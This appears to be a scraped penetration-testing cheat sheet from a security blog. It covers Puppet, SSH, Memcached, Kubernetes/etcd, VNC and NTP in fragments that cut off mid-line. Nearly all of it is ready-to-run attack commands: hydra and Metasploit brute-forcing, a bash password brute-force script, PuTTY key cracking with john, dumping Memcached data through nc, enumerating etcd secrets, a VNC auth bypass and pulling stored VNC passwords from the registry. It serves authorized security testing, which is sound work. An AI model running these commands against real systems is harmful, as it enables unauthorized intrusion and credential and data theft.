Steinz Security

  Checklist Check the version Vulnerabilities (get version from API) Refer to this Tenable Article Check for Puppet Naive autosigning enabled --> should be disabled you can scan it by via "nmap -p8140 --script puppet-naivesigning -sV 10.10.10.10" nmap -sSVC --privileged -vvv --reason -p 8140 --script puppet-naivesigning --script-args puppet-naivesigning.csr=/path/to/csr.pem,puppet-naivesigning.env=production,puppet-naivesigning.node=DomainnameOfAppServerControlledByPuppet 10.10.10.10 Look for unauthenticated API Access If API is accessible, run all commands to get Sensitive info Run this script Puppet_Pentest.py to Run most of the below commands at once. #Check whether Puppet Server is running on a server or not https://10.10.10.10:8140/status/v1/simple #Puppet Service Information - Check Services info (Agents) curl -k -X GET https://PUPPET-SERVER:8140/status/v1/services #Retrieve information about services running on Puppet Server https://10.10.10.10:8140/status/v

NMAP Commands nmap -sCV -p22 10.10.10.10 #nmap Vuln scan nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10 #nmap Algorithm enum #if you find CBC & HMAC in ciphers --> vulnerable nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10 Brute Forcing hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh hydra -l username -P password_file.txt -s port ssh Enum via Metasploit #User Enum --> works only on few old versions use auxiliary/scanner/ssh/ssh_enumusers #Version Detection use auxiliary/scanner/ssh/ssh_version #Brutefocing SSH use auxiliary/scanner/ssh/ssh_login #FTP Bruteforce use auxiliary/scanner/ftp/ftp_login Cracking SSH Private Key.ppk sudo apt install putty-tools #Genrate id_rsa for ssg login, if it asks for password - Password needs to be cracked puttygen private.ppk -O private-openssh -o id_rsa putty2john private.ppk > hash john --format=PuTTY --fork=4 hash -w=wordlist.txt #Enter the cracked password puttygen private.ppk -O private-openssh -

  Memcached - Port 11211,10013 telnet 10.10.10.10 10014 #run stats to view info stats version Enum using Mem Tools apt install libmemcached-tools #Get stats memcstat --servers=10.10.10.10 #Dump key value pairs memcdump --servers=10.10.10.10 #upload a file memccp --servers=10.10.10.10 a.txt #view a file memccat --servers=10.10.10.10 /etc/passwd #List items stats items Enum using Metasploit use auxiliary/gather/memcached_extractor set rhosts 10.10.10.10 run Bruteforcing Memcached Creds #! /bin/bash while read F ; do echo "Trying $F" if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then echo "Password Found: "$F break fi done < $3 ./script $target $username <wordlist> Dump all the Data from the keys/files while read -r key; do [ -f "$key" ] || echo "get $key" | nc 10.10.10.10 11211 > "$key.dump"; done < <(memcdump --server 10.10.10.10) Check this out for more in

     Ports Info Kubelet API: Port 10250: The Kubelet is the main component in every Node, all pod operations goes through the kubelet Etcd: Port 2379: Etcd is a DB that stores cluster's data, it contains configuration and current state iformation, and might contain secrets API Server: Port 6443: The API server is in charge of all operations on the cluster. - Check API's Access Kube-Hunter #Download kube-hunter from the releases https://github.com/aquasecurity/kube-hunter/releases ./kube-hunter #start active scan ./kube-hunter --cidr 10.10.10.10 --active ETCD Anonymous Access 2379/tcp & 2380/tcp - etcd servers Download etcdctl from here etcdctl --endpoints=http://10.10.10.10:2379 get / –prefix –keys-only for ip in $(cat kube_pods); do etcdctl --endpoints=http://$1:2380 get / –prefix –keys-only | grep -v "rpc error:"; echo "---------- testing $ip-----------" ; done Look for Open Pods Ports 10200 - 10259 curl -kvL https://10.10.1

#nmap - Finding VNC Enabled Servers nmap -Pn - p5900,5901,5902,5903,5905,5906 10.10.10.0/24 -p5910,5911,5912,5914,5915,5916 #Nmap Script Scan nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p5900 10.10.10.10 #VNC brute using nmap nmap -Pn -sV -p5900 --script vnc-brute 10.10.10.10 Metasploit Auth Scanning use auxiliary/scanner/vnc/vnc_none_auth set RHOSTS 192.168.1.0/24 set THREADS 50 run or use use auxiliary/scanner/vnc/vnc_login Brute forcing VNC Creds hydra -s 5901 -P pass.txt -t 16 10.10.10.10 vnc VNC 4 --> Real VNC 4 - Auth Bypass Get VNC Password from Registry reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly" vncpwd.exe PASSWORD_FROM_ABOVE Search for keyword "pass,cred,vnc and config" dir /s *pass* == *cred* == *vnc* == *.config*  

NTP - Port 123 nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 10.10.10.10 ntpq -c readlist <IP_ADDRESS> ntpq -c readvar <IP_ADDRESS> ntpq -c peers <IP_ADDRESS> ntpq -c associations <IP_ADDRESS> ntpdc -c monlist <IP_ADDRESS> ntpdc -c listpeers <IP_ADDRESS> ntpdc -c sysinfo <IP_ADDRESS> #You can use any of the below commands :config drefid mreadlist readvar addvars exit mreadvar reslist apeers help mrl rl associations host mrulist rmvars authenticate hostnames mrv rv authinfo ifstats ntpversion saveconfig cl iostats opeers showvars clearvars kerninfo passociations sysinfo clocklist keyid passwd sysstats clockvar keytype peers timeou